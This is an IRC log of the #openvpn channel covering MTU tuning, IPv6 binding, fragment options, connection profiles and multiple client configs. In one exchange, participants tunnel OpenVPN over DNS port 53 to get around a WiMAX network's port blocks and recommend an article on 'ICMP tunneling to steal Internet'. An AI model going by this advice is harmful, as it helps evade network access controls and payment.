21:06 < njbair> USB is flaky on the Pi. But if you plug in a powered hub it's great
21:06 < Poster> oh could be, I don't own one yet, I should though
21:06 < Poster> sorry excuse for a geek =[
21:06 < njbair> I own 2
21:07 < njbair> not played much with them, though
21:07 < Poster> I did some work with OpenWRT on the Routerboard RB411
21:07 < Poster> that worked well
21:08 < njbair> OpenWRT has some great capabilities
21:08 < njbair> but we needed something a bit more stable for the office, so I chose DD-WRT instead
21:08 < Poster> yeah I used it with an old atheros minipci card for some wireless goodness
21:10 < njbair> DD-WRT is one of those projects that always seems dead, but isn't
21:11 < Poster> it seems pretty mature
21:11 < Poster> not sure what major changes would come down in the past few years
21:11 < njbair> Mainly, device support
21:12 < Poster> yeah, I could see that
21:18 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds]
21:45 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
21:54 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Quit: Leaving]
22:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
22:22 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
22:23 -!- Gustaffs [~gh55738@46.165.221.13] has joined #openvpn
22:24 < Gustaffs> Hi guise.. just a question... for Wimax what would be a good mtu?
22:25 < Gustaffs> because openvpn drops my connection frequently... I'm not sure if it is because of packet loss or something else
22:25 < Poster> have you tried something like a continuous ping?
22:25 < Poster> to compare against?
22:25 < Gustaffs> yup
22:25 < Gustaffs> it is stable
22:25 < Gustaffs> no packet loss
22:25 < Poster> are you using UDP?
22:26 < Gustaffs> yup port 53
22:26 < Poster> ok try switching to UDP
22:26 < Poster> oops, TCP I meant
22:26 < Gustaffs> Can't do it
22:26 < Gustaffs> hehe
22:26 < Poster> oh you're piercing through
22:26 < Gustaffs> because it would be of no use for me
22:26 < Gustaffs> yup
22:26 < Gustaffs> lol
22:26 < Poster> I've had that too
22:26 < Poster> it's probably rate limiting upstream
22:26 < Poster> what client OS are you using?
22:27 < Gustaffs> Linux
22:27 < Poster> that can be a tough one, but you may be able to do something using tc to introduce some latency
22:27 < Poster> and find the sweet spot of the rate limiter
22:28 < Poster> http://stackoverflow.com/questions/614795/simulate-delayed-and-dropped-packets-on-linux
22:28 <@vpnHelper> Title: tcp - Simulate delayed and dropped packets on Linux - Stack Overflow (at stackoverflow.com)
22:28 < Gustaffs> yup I already tried that... and also I setup frag to 1450 which was supposed to be the right tuning
22:28 < Poster> you might need to go really low
22:29 < Gustaffs> like 500?
22:29 < Gustaffs> xD
22:29 < Poster> I believe per RFC, DNS is supposed to switch to TCP for responses over 512 bytes
22:29 < Poster> so figuring in the overhead, maybe 450 or so
22:29 < Gustaffs> I see.... let me try that
22:29 < Gustaffs> let me try on the other computer
22:30 < Gustaffs> with the wimax dongle
22:30 < Poster> have you tried 80 or 443 tcp?
22:30 < Gustaffs> yup no go :(
22:30 < Gustaffs> they have it blocked
22:30 < Poster> gotcha
22:30 < Gustaffs> so I can only go through 53 udp
22:30 < Poster> those are sometimes open
22:31 < Poster> I assume you've tried 53/tcp also?
22:31 < Gustaffs> yup I tried 80, 8080, 9090, 443, 53 tcp
22:31 < Gustaffs> and same for udp
22:31 < Gustaffs> and just 53 udp works
22:31 < Poster> yeah I have had a few of those too
22:31 < Gustaffs> on wifi it works sweet
22:32 < Gustaffs> but just with wimax :(
22:32 < Poster> yeah I think I was somewhere that wanted me to pay
22:32 < Gustaffs> also I was thinking that it could be the link quality
22:32 < Poster> pings are relatively small
22:32 < Gustaffs> any way to improve link quality or get statistics on linux for wimax
22:32 < Poster> I think there's also ICMP tunneling
22:32 < Poster> though I don't know how secure it really is
22:32 < Poster> you'd probably want to wrap something inside it
22:33 < Gustaffs> I did with a cocacola can
22:33 < Gustaffs> lol
22:33 < Gustaffs> Coke
22:34 < Poster> http://neverfear.org/blog/view/9/using_icmp_tunneling_to_steal_internet
22:34 <@vpnHelper> Title: NEVERFEAR.org - Using ICMP tunneling to steal Internet (at neverfear.org)
22:35 < Gustaffs> cool
22:35 < Gustaffs> let me check it
22:35 < Gustaffs> thx
22:36 < Poster> I would probably run a TCP flavor of OpenVPN through it though, it looks like it just forwards TCP
22:37 < Poster> so you'd either need to use a TCP based VPN link or jump into various proxies
22:38 < Gustaffs> pretty nice article
22:38 < Poster> probably good to put some sensible filtering on the other side too
22:39 < Gustaffs> totally :)
22:40 < Gustaffs> let me try something... probably that would be better... I'll connect from another computer to stay on IRC while I try with wimax here
22:41 < Poster> ok good luck
22:41 < Gustaffs> thx bro :)
22:42 < Poster> np!
22:46 -!- Gustaffs [~gh55738@46.165.221.13] has quit [Quit: Leaving]
22:48 -!- Gustaffson [~dell@tsn109-201-135-220.dyn.nltelcom.net] has joined #openvpn
22:49 < Poster> any luck?
22:50 < Gustaffson> well, it is connected to the vpn
22:50 < Gustaffson> no errors yet
22:50 < Gustaffson> i forgot to setup verb to 6
22:50 < Gustaffson> frag 480
22:50 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has joined #openvpn
22:51 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has quit [Read error: Connection reset by peer]
22:51 < Poster> oh, you're on the UDP OpenVPN link?
22:51 < Gustaffson> error already.... FRAG_IN error flags=0xfa2a187b
22:52 < Gustaffson> yup with the other computer
22:52 < Gustaffson> with wimax
22:52 < Gustaffson> not loading websites and it gives me the error mentioned above
22:52 < Gustaffson> FRAG TEST not implemented
22:53 < Poster> have you tried lowering the mtu?
22:53 < Gustaffson> yup but it always disconnected me with Backtrack errors
22:54 < Gustaffson> should I try something like tun-mtu 1400 and fragment 600 ?
22:55 < Poster> I would go much lower, 450 or so
22:56 < Poster> the other thing you can maybe try would be to leave the MTU alone
22:56 < Poster> then start sending ICMP echo requests through, slowly increasing their size
22:56 < Gustaffson> alright :)
22:56 < Poster> until you start dropping or getting errors
22:56 < Poster> I don't really know what you're going through, I've experienced similar behaviors
22:57 < Poster> I think it's probably a matter of tweaking the size and possibly introducing latency to keep it from kicking in
22:57 < Poster> I am imagining it is some type of traffic policing that once hit will drop frames
22:58 < Gustaffson> gotcha
22:58 < Poster> where we need to implement shaping in a sense to keep it under that threshold
22:58 < Gustaffson> pretty cool... makes sense
22:58 < Poster> get that a lot of time on dedicated lines
22:58 < Gustaffson> could you give me an example of a good ping for icmp echo request?
22:58 < Gustaffson> i mean on how to start....
22:59 < Poster> ok you're using a Linux client correct?
22:59 < Gustaffson> yup
23:00 < Poster> ok so try something like
23:00 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
23:00 < Poster> ping www.google.com
23:00 < Poster> across the link
23:00 < Poster> watch for drops or errors from OpenVPN
23:00 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
23:00 < Poster> then start creeping the size up
23:00 < Poster> ping -s 100 www.google.com
23:00 < Poster> see how it goes
23:00 < Poster> slowly bringing the size up until you hit errors
23:00 -!- master_o1_master [~master_of@p4FF24F5D.dip.t-dialin.net] has joined #openvpn
23:00 < Poster> appears to be about 28 bytes overhead in an icmp echo request
23:01 < Gustaffson> oh gotcha... i know how to ping :P i just didnt know the packet size to start with hehe
23:01 < Poster> oh, sorry =[
23:01 < Poster> <- Captain Obvious
23:01 < Gustaffson> no packet loss ... 35 sent 35 received and lol time is 38446ms :o
23:01 < Poster> goodness
23:01 < Gustaffson> lol no wonder hahahahhaa feel dumb now
23:02 < Poster> that's rough
23:02 < Gustaffson> that is hell of a latency right there lol
23:02 < Poster> yep
23:02 < Poster> I'd maybe try the icmp tunnel
23:02 < Gustaffson> yup I'll give it a shot
23:02 < Gustaffson> and THANK YOU bro
23:02 < Gustaffson> sorry for being that dumb lol haha
23:02 < Poster> need to bail for the evening, good luck!
23:02 < Poster> np ; have fun
23:02 < Gustaffson> take care man
23:02 < Gustaffson> see ya!
23:02 -!- Gustaffson [~dell@tsn109-201-135-220.dyn.nltelcom.net] has left #openvpn []
23:04 -!- master_of_master [~master_of@p4FF245E4.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
23:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:55 -!- corretico [~luis@190.211.93.38] has joined #openvpn
23:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
--- Day changed Tue Mar 19 2013
00:00 -!- xbanux [~xbanux@triband-mum-59.182.164.172.mtnl.net.in] has joined #openvpn
00:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
00:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 255 seconds]
00:24 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds]
00:33 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
01:05 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Read error: Connection reset by peer]
01:06 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn
01:11 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 252 seconds]
01:16 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
01:29 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn []
01:36 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
01:44 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
01:45 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has quit [Quit: nonotza]
01:49 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 256 seconds]
01:50 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has quit [Ping timeout: 256 seconds]
01:50 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Ping timeout: 256 seconds]
01:52 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn
01:55 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has joined #openvpn
01:55 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has quit [Changing host]
01:55 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn
02:15 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
02:17 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
02:17 -!- mode/#openvpn [+o mattock_afk] by ChanServ
02:17 -!- mattock_afk is now known as mattock
02:19 -!- hatschi [~marvin@dslb-188-098-207-219.pools.arcor-ip.net] has joined #openvpn
02:26 -!- mattock is now known as mattock_afk
02:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:33 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn
02:33 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host]
02:33 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:35 -!- mattock_afk is now known as mattock
02:48 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
02:50 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn
02:55 -!- xbanux [~xbanux@triband-mum-59.182.164.172.mtnl.net.in] has quit [Read error: Connection reset by peer]
02:55 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn
03:16 -!- brute11k [~brute@89.249.235.131] has joined #openvpn
03:23 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Ping timeout: 276 seconds]
03:23 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn
03:37 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn
03:40 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 256 seconds]
03:40 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has quit [Ping timeout: 252 seconds]
03:46 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has joined #openvpn
03:55 < jzaw> ecrist EugeneKay im looking at the ipv6 for openvpn
03:55 < jzaw> am i misunderstanding something cos it seems you still have to have ipv4 for ipv6 to pass down the tunnel?
03:57 < pekster> Correct. Currently the code assumes that all clients have an IPv4 address, and it's non-trivial to change that at the moment (maybe 2.4.x will do so, but that's yet to be determined)
03:57 < jzaw> ah thanks pekster
03:57 < jzaw> i was pulling my hair out thinking my google-fu had finally left me !
03:58 < jzaw> scary i know
03:58 < pekster> It shouldn't be a problem to pick some obscure rfc1918 network if you really don't want/need IPv4 at all
03:58 < jzaw> just for tunnel ends?
03:58 < pekster> Right
03:59 < jzaw> but it still only connects via ipv6 in its entirety ?
03:59 < jzaw> so endpoints have both ipv4 and 6 ips
03:59 < pekster> I thought you were talking about the tunneled traffic...
04:00 < jzaw> im doing that now ... routing ipv6 down an established ipv4 tunnel
04:00 < jzaw> but id like to establish a tunnel on ipv6 only ... is that possible?
04:01 < pekster> For the inside or outside IPs is what I'm trying to get at
04:01 < jzaw> there are hosts out there that are ipv6 only .... ie loopsofzen.co.uk
04:02 < jzaw> if by outside you mean the config stages ... thats what im after
04:02 < pekster> And what are you trying to do? Reach a host like that, or connect to an openvpn server running on it?
04:03 < jzaw> ie the server (server-ipv6) only has an ipv6 addy .. say
04:03 < jzaw> connect to a ovpn server on that
04:03 < jzaw> if it had a server
04:04 < jzaw> loopsofzen cant be reached by ipv4 ... unless youre doing some 6to4 or what ever but then youre still only reaching via ipv6
04:04 < pekster> Looks like that's not supported at present. It's bound to 0.0.0.0:1194 for me, and attempts to bind it to my IPv6 address specifically seem to fail
04:05 < jzaw> ah so cant bind to :::1194
04:05 < pekster> If your goal is to *reach* a host like that, just connect to a tunneling service that provides you IPv6. This could be HE, sixxs.net, or an openvpn tunnel where you get an IPv6 address
04:05 < pekster> That works fine over OpenVPN
04:05 * jzaw nods
04:05 < jzaw> i have ipv6 both native (at home) and HE here
04:06 < pekster> Sure. I use openvpn to get an address on my sixxs.net allocation when I'm not at home
04:06 < pekster> I use openvpn anyway, so it was natural to have it feed me a v6 address too (what else am I going to do with a /48...)
04:06 < jzaw> indeed
04:07 < jzaw> and ive actually got part of my /48 from home vpn'd to here (Poland)
04:07 < jzaw> its funny to firewall myself way way over there in the uk
04:08 < jzaw> the thing i was wanting to setup was independent ipv4 and ipv6 tunnels
04:08 < jzaw> so if i borked up my ipv4 settings either end i could still get in and admin via ipv6 (securely)
04:08 < pekster> Attempting to bind to an IPv6 address with the --local directive fails:
04:08 < pekster> RESOLVE: Cannot resolve host address: fe80::a44:1: Address family for hostname not supported
04:08 < jzaw> what addy were you trying to use there?
04:09 < pekster> An arbitrary link address I added
04:09 < pekster> fe80::/10 is link-local. You can add whatever you want there
04:10 * jzaw nods
04:10 -!- zz_AsadH is now known as AsadH
04:10 < pekster> It doesn't work with my globally routable address either, fwiw
04:10 < jzaw> what about a real global pekster
04:10 < pekster> Yea, I tried it too. It doesn't matter (if it did, a massive bug somewhere would have just been uncovered)
04:11 < pekster> IPv6 "doesn't care" in the least
04:12 < pekster> Although I suppose it could if you assigned the same IP on multiple links. Linux knows how to deal with them as long as they're unique. Windows outright refuses
04:13 < jzaw> wouldnt that be an effective bridge?
04:13 < pekster> ?
04:13 < jzaw> same ip on multiple links
04:13 <@EugeneKay> No.
04:14 < pekster> fe80::/10 is special. Plenty of RFC to read on that point
04:14 < pekster> It's scoped per-link
04:14 < jzaw> k :)
04:14 <@EugeneKay> Bridging combines broadcast domains. Having the same IP on multiple NICs doesn't do that by itself
04:15 < jzaw> so no go on ipv6 tunnels at the mo
04:15 < jzaw> i see EugeneKay
04:25 < pekster> I'll have to poke at it more later, but the function throwing that error message is actually IPv6-supported, but many of its callers aren't
04:27 < jzaw> cool ta
04:29 < pekster> Actually, maybe it's just the assumption in_addr_t() makes. Too late for me to poke at this now, but I'll see if I can't make some sense of the code later. Feel free to check for a bugreport on the topic at openvpn.net under the community portal and file one if there isn't one there already
04:29 < jzaw> will look thx :)
04:37 -!- brute11k [~brute@89.249.235.131] has quit [Read error: Connection reset by peer]
04:38 < hatschi> pekster: hi
04:39 < hatschi> pekster: we had a discussion last week about a fragmentation issue. can you remember this?
04:39 < pekster> Let's assume not.
04:40 -!- brute11k [~brute@89.249.235.131] has joined #openvpn
04:41 < hatschi> pekster: we tried to reproduce it with a minimal config. and after some time i was able to reproduce the issue with a minimal config, but it seems that you have been away from your machine by this time. maybe you have read my follow up or not...
04:41 < pekster> Oh, sounds vaguely familiar. You had to use a connection profile, right?
04:42 < hatschi> yes, that was it ;)
04:42 < hatschi> when using connection profiles 2.3 forgets about the fragmentation, while 2.2 is honouring it...
04:43 < pekster> That stuff tends to be ephemeral for the duration of a conversation. However, I believe I read some note that global options specified *before* a connection profile would be used by all of them
04:43 < hatschi> for my setup it was no big deal to remove the connection profiles because it was a relic from former times, but i don't know how to handle this - if this is a bug or a feature.
04:44 < pekster> Depends on if it works properly when the fragmentation options are placed above (ie: not below, or "after") the profile itself
04:44 < hatschi> then it sounds like a feature ;)
04:44 < hatschi> lets see if my test vm's are still alive...
04:44 < pekster> Official builds of 2.3.0 won't work with --verb 4 to show you or I'd suggest you try that. Building git master will (my patch that fixed this was committed recently) or you could wait until 2.3.1 comes out which should have it
04:45 < pekster> If you can reproduce it in 2.2.2, that's a valid test case; did your minimal test config do the right thing when a 2.2.2 client used it?
04:46 < hatschi> yes, it works with 2.2.? - currently i don't know if the former version was 2.2.1 or 2.2.2...
04:46 < pekster> 2.2.2 -> 2.3.0
04:46 < pekster> For official releases anyway
04:48 < pekster> See if 2.3.0 works with the frag stuff above your profile. If not, it's probably a bug (filing your minimal config files in the bug tracker at openvpn.net would be wise in such a case, after checking for an existing bug, of course)
04:51 < hatschi> pekster: i've just tried it with my vm's: even placing fragment before the connection profile doesn't help - i still get the fragment errors on the server.
04:52 < pekster> Can you file a bugreport then? Include the server config, and the working/not-working minimal test cases you have? Be sure to note versions used (2.3.0 I think on your client, versus that it worked *with* the connection profiles as expected under 2.2.2)?
04:53 < pekster> That would keep it on the radar, where IRC isn't exactly a form of "reliable delivery" ;)
04:53 < hatschi> hmm.
04:54 < hatschi> now it's going to get interesting. i can't get back to a working config...
05:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:03 < hatschi> okay. i was wrong - there was another openvpn client process running on the test machine that was mixing up everything.
05:04 < hatschi> final results are: fragmentation works if the statements are before the connection profile, but not after for 2.3
05:04 < pekster> And that's consistent with the documentation I found
05:04 < pekster> I think under the connection profile part of the manpage
05:06 < hatschi> okay. i've missed this one and it seems to have been an issue for at least 2.2.1 - do you have a 2.2.2 binary that could work with centos ?
05:07 < hatschi> s/it seems to have been an issue/it seems not to have mattered
05:08 < hatschi> nevertheless it works as designed so we don't have a bug in 2.3 ;)
05:08 < pekster> I don't. rpmforge might, or the usual places. Building your own from source isn't that hard, more so if you can just grab the srpm from $upstream for 2.2.1 and just build 2.2.2 the same way
05:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds]
05:12 < hatschi> do you think we should put so much effort in a 'probably existing config parsing bug' of an older version? okay, we have a few scenarios stumbling into (like me) when upgrading from 2.2 to 2.3 but what to do if we fix it for 2.2.3? then we have the issues when doing a minor upgrade, and i think that would hurt harder… ;)
05:14 < pekster> Right. If there's not a bug in 2.3.0 it's probably of less interest. Presumably it could be back-ported, but if someone is upgrading to 2.2.whatever (whatever >2) 2.3.0 might as well be used. IMO anyway
05:15 < pekster> Then again, maybe it's an easy change. Until someone decides to track down the issue, it remains a mystery. I have enough code I'm more interested in hacking at that it's less of a concern for me personally, especially if 2.3.0 works. And I care even less if there's no official bug to refer to ;)
05:19 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Ping timeout: 255 seconds]
05:19 -!- bla [bla@unaffiliated/bla] has quit [Ping timeout: 255 seconds]
05:19 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds]
05:19 -!- lbft [~lbft@199.195.249.177] has quit [Ping timeout: 260 seconds]
05:19 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 260 seconds]
05:19 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 255 seconds]
05:19 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Ping timeout: 255 seconds]
05:19 -!- dvl [~dan@pdpc/supporter/active/dvl] has quit [Ping timeout: 255 seconds]
05:19 -!- qmr [~qmr@50.116.18.140] has quit [Ping timeout: 260 seconds]
05:19 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds]
05:19 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 260 seconds]
05:20 -!- bla [bla@vivane.thera.be] has joined #openvpn
05:20 -!- bla [bla@vivane.thera.be] has quit [Changing host]
05:20 -!- bla [bla@unaffiliated/bla] has joined #openvpn
05:20 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Quit: changing servers]
05:20 -!- qmr [~qmr@50.116.18.140] has joined #openvpn
05:20 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
05:20 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Remote host closed the connection]
05:20 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
05:20 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn
05:20 -!- tyteen4a- [tyteen4a03@69.50.229.69] has joined #openvpn
05:20 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds]
05:20 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn
05:20 -!- lbft [~lbft@199.195.249.177] has joined #openvpn
05:20 -!- corretico_ [~luis@190.211.93.38] has joined #openvpn
05:21 < hatschi> pekster: just fetched a 2.2.2 from the 'usual sources' and: it honours the fragmentation statement below the connection policy, like 2.2.1 did.
05:21 -!- dvl [~dan@nyi.unixathome.org] has joined #openvpn
05:21 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood]
05:21 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
05:21 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Excess Flood]
05:21 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
05:21 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn
05:21 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
05:21 < pekster> Right. If that change to support it above the profile was made between 2.2 and 2.3, that sounds fair
05:22 < pekster> The solution for >=2.3.0 systems is to put the settings all profiles need above the profiles
05:22 < pekster> Unless I missed something
05:26 < hatschi> yes, that's right.
05:26 < hatschi> i just searched trac but i didn't find an issue that could match the symptoms we found...
05:26 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:28 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 05:30 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 05:30 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 05:35 -!- dpecka [~dpecka@193.165.171.107] has left #openvpn [] 05:37 -!- dazo_afk is now known as dazo 05:40 < hatschi> https://community.openvpn.net/openvpn/ticket/267 05:40 <@vpnHelper> Title: #267 (Configuration: fragementation statements after connection profiles honored by mistake) – OpenVPN Community (at community.openvpn.net) 05:49 -!- csaba [~csaba@195.199.154.25] has quit [Quit: Távozom] 06:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 06:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 06:12 -!- go [~puck@unaffiliated/go] has joined #openvpn 06:13 < go> hi everyone 06:13 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 06:13 < go> is there a howto through which i could setup multiple connections to different severs? I have a debian server and i want to connect to server1 and server2 at the same time. 06:14 <@EugeneKay> Just start openvpn multiple times. Most distro's init scripts will start all .conf files in /etc/openvpn/(debian included) in alphabeticalish order 06:14 <@EugeneKay> You'll need to make sure that the confs(IPs mostly) don't conflict with each other 06:16 < go> those won't, but the ports won't be an issue? 06:16 <@EugeneKay> If you're running in client mode you shouldn't have any problem with the local source port 06:16 <@EugeneKay> If you're forcing a particular source port then you will need to make those non-conflicting 06:16 <@EugeneKay> But that's silly :-p 06:17 < go> I am in client mode, so I guess all should be good and the interfaces should be alright too, right? 
06:18 <@EugeneKay> Specifying the same tun# device in multiple configs will give you problems in the same fashion; specify 'device tun' and it'll auto-allocate an available #ed device 06:18 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Quit: Oh noes the internet broke.] 06:18 < go> okay, thank you very muhc 06:19 < pekster> jzaw: Figured it out. You need --proto udp6 06:21 < pekster> That's ill documented in the manpage, so I'll see if I can't submit a patch to clean up the docs. The code supports it, although it was not exactly straight forward to get to that feature from the resolver error that occurs when you feed it an IPv6 --local address with --proto udp 06:25 < go> EugeneKay: I'm getting "TCP/UDP: Socket bind failed on local address [undef]: Address already in use" 06:25 < go> i have two .conf files 06:26 < go> both conf files have the ports setup in them 06:26 < pekster> If these are client configs, you likely want the 'nobind' option 06:26 < pekster> If they're servers, you should explicitly configure them to listen on a different IP+port tupple 06:27 < go> they are clients 06:28 < go> okay, checking how to add the nobind option to the config files 06:28 < go> if I just remove the "port 1194" part and add "nobind", it should be okay? 06:29 < go> yupp, that was it, thank you very much (: 06:29 < pekster> No, you need the 'port' directive (at least if you didn't include the optional port in your remote statement.) 
'nobind' works in addition to that 06:29 < pekster> Ah, well, 1194 is also the default, so in that case it would work anyway 06:30 < go> thank you for your help pekster and EugeneKay 06:30 -!- go [~puck@unaffiliated/go] has left #openvpn [] 06:31 <@EugeneKay> Yeah, I think I said that :-p 06:32 < pekster> 1194 is the default, so in effect the "forced" default is --lport 1194 --rport 1194 06:40 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has joined #openvpn 07:11 -!- dazo is now known as dazo_afk 07:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Read error: Connection reset by peer] 07:18 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:20 -!- dazo_afk is now known as dazo 07:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:35 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Ping timeout: 257 seconds] 07:51 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn 08:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Remote host closed the connection] 08:03 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:10 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 08:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:18 -!- dvl [~dan@nyi.unixathome.org] has quit [Quit: I shouldn't really be here - dircproxy 1.0.5] 08:21 -!- mattock is now known as mattock_afk 08:29 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 08:30 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 08:32 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 260 seconds] 08:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:42 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 08:43 -!- xbanux 
[~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Ping timeout: 264 seconds] 08:44 -!- [fred] [fred@konfuzi.us] has joined #openvpn 08:46 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 08:51 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 08:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:56 -!- mattock_afk is now known as mattock 08:59 -!- mattock is now known as mattock_afk 09:01 -!- corretico_ [~luis@190.211.93.38] has quit [Ping timeout: 276 seconds] 09:04 -!- mattock_afk is now known as mattock 09:31 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:34 -!- marksaitis [~marksaiti@gemsyorkroad.demon.co.uk] has quit [Ping timeout: 245 seconds] 09:36 -!- Juzzy [Xinu@107-194-81-122.lightspeed.nsvltn.sbcglobal.net] has joined #openvpn 09:43 -!- hatschi [~marvin@dslb-188-098-207-219.pools.arcor-ip.net] has quit [Quit: hatschi] 09:57 -!- markovh [markov@unaffiliated/markovh] has joined #openvpn 09:58 < markovh> !welcome 09:58 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
